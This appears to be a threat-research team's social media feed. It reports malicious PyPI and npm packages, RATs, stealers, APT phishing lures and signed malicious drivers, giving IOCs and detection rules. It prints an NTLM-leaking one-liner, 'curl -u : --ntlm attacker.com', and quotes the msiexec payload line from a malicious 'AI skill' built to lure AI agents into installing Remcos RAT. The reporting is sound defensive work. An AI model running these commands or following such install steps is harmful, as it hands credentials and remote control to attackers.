Joined October 2024
111 Photos and videos
Pinned Tweet
We analyzed the top 500 most successful THOR rules – “successful” meaning: they detected samples that were either ignored or missed by nearly all AV engines on VirusTotal. Some rules detect clear malware. Others reveal dual-use tools, renamed hacktools, misused admin binaries, or forensic leftovers. Most of these samples showed 0 AV detections, the rest only minimal hits. Not all threats are payloads. Not all detections are flashy. But these rules consistently light up the blind spots in AV and EDR coverage – where attackers hide comfortably. THOR doesn’t replace existing tools. It shows you what they forgot to tell you. nextron-systems.com/2025/06/…
4
42
126
47,493
Our Artifact Scanner flagged "pylogxo", a PyPI typosquat of "pylogx" dropping Sirkeira Stealer from 69[.]164[.]245[.]166 to harvest browser credentials, Discord, Roblox data & more. Package has been removed from PyPI but the payload is still live. pylogxo: 7089c8c1c117fa7ffdc68abe4b3c4a6f83b2b4f1827d805bf52d8705cf14eaab Stealer: 3de7ccdf0fbe423b5646640d572a8a675f275e82f38eee76e067864b9993e730 C2: urlscan.io/result/019ebae6-a…
1
14
23
3,612
One more malicious npm package spotted: "hex-type@3.0.2" - part of the ongoing MicrosoftSystem64 RAT campaign that exfiltrates data via HuggingFace.
Compromised npm packages (utils-terminal@3.2.1, logger-active@3.2.1) are abusing Hugging Face repos as exfiltration infrastructure. The packages deploy a remote access trojan (RAT) that captures keystrokes, screenshots, and crypto wallet credentials. Indicators of compromise (IOCs): - npm user: hexalpha10 / author: toskypi - 195.201.194[.]107:8010 (WebSocket C2) - c2-toskypi.onrender[.]com (HTTP C2) - huggingface[.]co/api (exfiltration endpoint) - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64 (persistence) - MicrosoftSystem64.service (Linux systemd persistence) - \MicrosoftSystem64 (Windows scheduled task) - MicrosoftSystem64/payload.js (payload directory) Defenders: treat unexpected huggingface[.]co/api calls from non-ML workloads as suspicious.
9
30
5,472
Update: We identified two new UNC1549 / Nimbus Manticore phishing domains hosting the same fake Ebix recruitment portal from our previous reporting: hxxps://ebix[.]portal-career[.]com hxxps://ebix-exam[.]com IOCs and rules are available in THOR Lite and THOR Cloud Lite. Sign-up and scan your systems for free right now: thorcloud-lite.nextron-syste…

Detecting Nimbus Manticore (UNC1549) While previous reporting documented the threat actor’s operations, our analysis focuses on defender value: ◾ Multiple public YARA rules ◾ Campaign-specific detections ◾ Generic hunting logic ◾ IOC enrichment ◾ Detection opportunities across the full infection chain From LinkedIn lures and fake hiring portals to AppDomain hijacking, Azure infrastructure, and custom implants. Read the full research by @cod3nym: eu1.hubs.ly/H0vPgF80 #ThreatResearch #YARA #ThreatIntel
8
15
1,315
🚨 Our artifact scanner detected a malicious PyPI package: "cache-compat-utils@0.1.0" (publisher: "electracrimson"). The package uses "_patch.py" as a dropper to fetch the Bun runtime from GitHub and execute "_runtime.bin". Deobfuscated, the payload is a CI/CD secret stealer self-propagator with Shai-Hulud-style worm behavior: 🔑 Steals AWS, GitHub & npm credentials ☁️ Targets AWS IMDS, ECS, Vault & k8s tokens 🐙 Uses GitHub GraphQL npm recon to spread virustotal.com/gui/file/95d4…
1
16
39
5,035
Nextron Research ⚡️ retweeted
Related 'movie_data.msi' @abuse_ch bazaar.abuse.ch/sample/efc5f… FUD - 1 Thor Inside: 'svc_8xmlhr.ps1' bazaar.abuse.ch/sample/27228… FUD - 3 Thor @nextronresearch @cyb3rops
"SERVER": yuhvgbzsa66biqeatbmdvfo5b5jjefcmz5t2vjuvco5qtdkshfpabyid[.]onion "BUNDLE_PORT": 8443 "OPERATOR": "deus" "TAG": "msi_new1" 🤔 🤷‍♂️
3
9
4,855
Did you know curl can be used to leak your NTLM hash with a simple one-liner on your Windows machine? Mind you, curl is available on all Windows since Windows 10 / Windows Server 2019. curl -u : --ntlm attacker.com We discovered this technique being abused in recent Iranian APT campaigns of UNC1549 also known as Smoke Sandstorm and Nimbus Manticore. How it works: On Windows, curl (the included Microsoft version) uses SSPI to handle NTLM handshakes. When credentials are empty (:), curl passes NULL to AcquireCredentialsHandle - a documented SSPI behavior that tells Windows to use the current user's logon session credentials managed by LSASS, without ever touching the plaintext password. The result: your NTLMv2 response is sent straight to the attacker. For More details: github.com/curl/curl/blob/75… That's how a feature becomes an exploit. We published a free Sigma rule to detect this behavior: github.com/SigmaHQ/sigma/pul…
18
59
5,626
Nextron Research ⚡️ retweeted
0f820817e2b7efac3ed127bab09b989b 2/61 Low detection #QuasarRAT variant 5 comments by @nextronresearch
2
10
561
🚨 New Linux exfiltration tool designed to bypass EDR The malware abuses Linux io_uring to asynchronously access /etc/shadow and exfiltrate credential material over TCP with a minimal runtime footprint. Unlike traditional stealers that rely on conventional blocking I/O, it leverages kernel-managed submission and completion queues to perform stealthy file access. The sample appears optimized for rapid credential collection and exfiltration, with no significant persistence mechanisms observed. Because activity is offloaded through io_uring, it can significantly reduce visibility for monitoring solutions focused primarily on traditional syscall telemetry, making detection more challenging. Mitigation: Organizations whose security tooling lacks visibility into io_uring activity should validate coverage and consider restricting or disabling io_uring on systems where the performance tradeoff is acceptable. IOCs ea586cf89af8057ab44053cae16ea496fdb0337f88404db9618d0e0308b8a9e6 87fde30bc260a22caefc58e431e805330b5c0503ff5550ba571634756115387d
19
45
6,439
We analyzed a Sharp Dragon APT chain targeting Malaysian government officials A weaponized Word document posing as a US-China policy brief. Same actor. New campaign. New geography. The document is convincing, formatted as a legitimate diplomatic policy brief titled “Malaysia Policy Brief: Trump China Visit”, with a professional structure clearly designed for senior officials tracking US-China-ASEAN relations. The payload is a VBA macro that hides the embedded binary across 15 Form TextBox objects in the document’s UserForm. Nothing is dropped to disk until execution. Execution chain: VBA macro decodes the 15 TextBox chunks at runtime → assembles and drops a loader disguised as OneNote.exe → custom AES-128-ECB LZ4 decompression, intentionally avoiding CryptoAPI → Download_s.dll beacon → HTTP GET to /microsoftonline/common/oauth2/authorize.php impersonating Microsoft → NtMapViewOfSection into rundll32.exe → Stage 4 delivered Our @thor_scanner run produced the following YARA hits: SUSP_VBA_Dropper_Feb26 valhalla.nextron-systems.com… APT_MAL_DLL_Loader_May24 valhalla.nextron-systems.com… Doc sample (2/62) virustotal.com/gui/file/88b9… Second stage virustotal.com/gui/file/dccb… Downloader (stage3) sample virustotal.com/gui/file/d013…
1
20
50
5,539
Nextron Research ⚡️ retweeted
Two more recently published npm packages related to the same malware campaign: "ulid-os@3.0.2" and "obfus-jsxy@3.2.0". Both detected by THOR with multiple YARA rules.
Compromised npm packages (utils-terminal@3.2.1, logger-active@3.2.1) are abusing Hugging Face repos as exfiltration infrastructure. The packages deploy a remote access trojan (RAT) that captures keystrokes, screenshots, and crypto wallet credentials. Indicators of compromise (IOCs): - npm user: hexalpha10 / author: toskypi - 195.201.194[.]107:8010 (WebSocket C2) - c2-toskypi.onrender[.]com (HTTP C2) - huggingface[.]co/api (exfiltration endpoint) - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64 (persistence) - MicrosoftSystem64.service (Linux systemd persistence) - \MicrosoftSystem64 (Windows scheduled task) - MicrosoftSystem64/payload.js (payload directory) Defenders: treat unexpected huggingface[.]co/api calls from non-ML workloads as suspicious.
9
30
6,022
Detecting Nimbus Manticore (UNC1549) While previous reporting documented the threat actor’s operations, our analysis focuses on defender value: ◾ Multiple public YARA rules ◾ Campaign-specific detections ◾ Generic hunting logic ◾ IOC enrichment ◾ Detection opportunities across the full infection chain From LinkedIn lures and fake hiring portals to AppDomain hijacking, Azure infrastructure, and custom implants. Read the full research by @cod3nym: eu1.hubs.ly/H0vPgF80 #ThreatResearch #YARA #ThreatIntel
10
28
19,748
We've made it easier to deploy THOR Thunderstorm as a container by publishing a ready-to-use Docker Compose template and base image For those who haven't come across Thunderstorm before: It's our self-hosted scanning service that turns THOR into an API-driven scanning backend. Files and artifacts are collected from source systems and analyzed centrally. The interesting part is not Docker itself. The interesting part is where this becomes easier to deploy: - Edge devices and network appliances that cannot run THOR directly - Embedded and exotic operating systems - Legacy systems with limited resources - OT and critical infrastructure environments - Mail and file gateway scanning - Malware ingestion pipelines - Build and artifact scanning workflows - Supply-chain security checks Collectors can be configured to retrieve only specific file types, paths, sizes, ages or file signatures and forward them to a central Thunderstorm instance. The heavy lifting happens on the Thunderstorm server, not on the source system. And because this still causes confusion surprisingly often 😄 THOR Thunderstorm is not SaaS. The service runs in your environment. The samples stay in your environment. No files need to be uploaded to Nextron. We put together the deployment template and documentation to make this easier to test and deploy. Repository: github.com/NextronSystems/th…
7
13
2,770
We identified a WHQL-signed kernel driver keylogger, likely deployed as an anti-cheat BYOVD SHA256 bb1b4e46f1e4a7f17b1b04ee08c33400b2b6fd2327612a4d84da81e2656ba48b SignatureSpcSpOpusInfo=Xryus Technologies. Stealth - APIs resolution by hashing - XOR-obfuscated strings - Time-randomized paths (no IOC) Capabilities - Retrieve captured keystrokes from kernel ring buffer (cf. picture) - Pull captured mouse events ring buffer - Suppress predetermined keystrokes POC gist.github.com/pierrehpezie…
2
42
162
20,646
Nextron Research ⚡️ retweeted
The package lights up in our internal artefact monitoring like a Christmas tree 🎄 Turns out you don’t need AI 🤖 to spot this Sensitive generic YARA rules still do the job, annoyingly well
🚨 The "𝙼𝚎𝚐𝚊𝚕𝚘𝚍𝚘𝚗" Campaign is live... 𝟻,𝟽𝟷𝟾 malicious commits to 𝟻,𝟻𝟼𝟷 GitHub repositories in a six-hour window. Using throwaway accounts and forged author identities (build-bot, auto-ci, ci-bot, pipeline-bot), the attacker injected 𝙶𝚒𝚝𝙷𝚞𝚋 𝙰𝚌𝚝𝚒𝚘𝚗𝚜 workflows containing 𝚋𝚊𝚜𝚎𝟼𝟺-𝚎𝚗𝚌𝚘𝚍𝚎𝚍 bash payloads that exfiltrate: - CI secrets, - cloud credentials - SSH keys - OIDC tokens - source code secrets Check your repo / Technical details: safedep.io/megalodon-mass-gi…
15
66
10,319
THOR Thunderstorm is not a public malware upload portal It is a self-hosted THOR scanning service designed for environments where visibility is difficult, restricted or simply impossible with normal endpoint tooling Samples stay local. Processing stays under customer control. Deployments run on-prem, in isolated labs, OT segments or customer-controlled cloud infrastructure. Thunderstorm was built for situations where: - agents cannot run - systems are too old or exotic - uploads to external services are not acceptable - forensic artifacts need centralized analysis - pipelines need scalable scanning without giving away samples Collectors can acquire files from virtually anything: - legacy UNIX - OT/ICS systems - appliances - CI/CD pipelines - mail gateways - forensic images - malware ingestion workflows The heavy lifting happens centrally THOR then applies the same detection philosophy we use across our compromise assessment tooling: - broad artifact coverage - YARA beyond simple file matching - detection of post-compromise traces - visibility into scripts, configs, persistence and forensic artifacts that runtime-focused tooling often misses Thunderstorm is intentionally built for controlled environments and professional workflows ; not mass-market sample submission That design decision matters more and more lately nextron-systems.com/thor-thu…
8
39
6,170
Valhalla is not a public dump of YARA and Sigma rules It is a continuously maintained detection feed curated by the Nextron Research Team and improved together with partners like @ThreatrayLabs, @VirusTotal, @AWNetworks, and @ExigerLLC More than 24,000 #YARA rules and 900 #Sigma rules. Thousands of older rules reworked, tightened and re-tested over time. False positives reduced continuously through large-scale QA and real-world feedback loops. Access is intentionally limited We review every request carefully and only grant access to organizations that fit the operational and security requirements for handling sensitive detection content responsibly Valhalla was built for professional detection engineering, threat hunting and high quality scanning environments ; not for mass distribution That is also why the feed remains effective nextron-systems.com/valhalla…
12
54
6,106
Following the initial report from @wiz_io on compromised MistralAI packages, our artifact‑scanning pipeline has identified additional Shai Hulud–infected NPM artifacts: mistralai/mistralai-gcp v1.7.3 mistraliai/mistralai-azure v1.7.3 These packages are used for direct cloud deployments, and should be considered compromised as part of the ongoing Mini Shai-Hulud supply-chain campaign. Until the situation is resolved, we recommend treating all recent mistralai releases with caution and reviewing any CI/CD systems where these versions may have been installed. THOR APT Scanner already provides coverage for the currently known Shai Hulud–infected Mistral AI NPM and PyPI artifacts. related: wiz.io/blog/mini-shai-hulud-… github.com/mistralai/client-…
1
21
42
5,175
We analyzed Heartflabrace/Doubao-Claw A malicious "AI skill" posing as a Volcengine/ByteDance Doubao CLI, part of the OpenClaw "Claw" malware ecosystem @Zscaler exposed last week. The lure is 7,000 words of legitimate-looking documentation including FAQs, architecture diagrams, Rust crate examples and pricing tables, upholding the illusion of legitimate project. The payload is a single line buried in the Windows install section: -> cmd /c start msiexec /q /i https://cloudcraftshub[.]com/api -> rem Doubao Claw uses the same C2 as the DeepSeek-Claw sample @Zscaler documented. Same operator handle. Different brand impersonation. If an AI agent follows the install the MSI drops a signed GoToMeeting binary malicious DLL → sideload → ETW/AMSI patching in memory → TEA-CBC decrypt → Remcos RAT beaconing Our scan triggered THOR APT Scanner YARA hits: SUSP_LOLBAS_2 : valhalla.nextron-systems.com… Ultimate_AppLocker_ByPass_List_Strings : valhalla.nextron-systems.com… Zscaler write-up: zscaler.com/blogs/security-r… Sample (Doubao-Claw, 0/62): virustotal.com/gui/file/f90e…
13
28
4,619
Dirty Frag is a Linux LPE case worth watching closely It chains two page-cache write issues to gain root on major Linux distributions, and the current situation is messy: - high impact local privilege escalation - public PoC available - one part patched in mainline - another part still waiting for a proper upstream fix - mitigations currently involve blocking/removing affected modules Our team created first YARA rules for the public Dirty Frag exploit, the observed shellcode and forensic artefacts / PoC usage patterns We’re sharing them with the community because the impact is high and defenders will probably see PoCs, test builds and modified variants very soon Rules github.com/Neo23x0/signature… Dirty Frag reference github.com/V4bel/dirtyfrag/
17
55
6,955
Another day another suspicious WHQL-signed driver... We identified a signed sample of RedDriver, a malicious kernel driver that abuses Windows Filtering Platform (WFP) to intercept and manipulate browser traffic at the network layer. By operating below user mode, it can hijack connections without triggering traditional browser- or API-level monitoring. It abuses WFP callouts to inspect and redirect traffic in real time, basically acting like a man-in-the-middle inside the OS. RedDriver features credential exfiltration, traffic redirection and tampering. The sample was identified by a rule from 2023. Highlighting the long term effectiveness of well-crafted detections. IOCs: fd28c1ef42dc959c875fff1104d3774ef0973f026498af08fc86dea2f849832a C:\Windows\Temp\anticheatG13.sys
16
42
5,335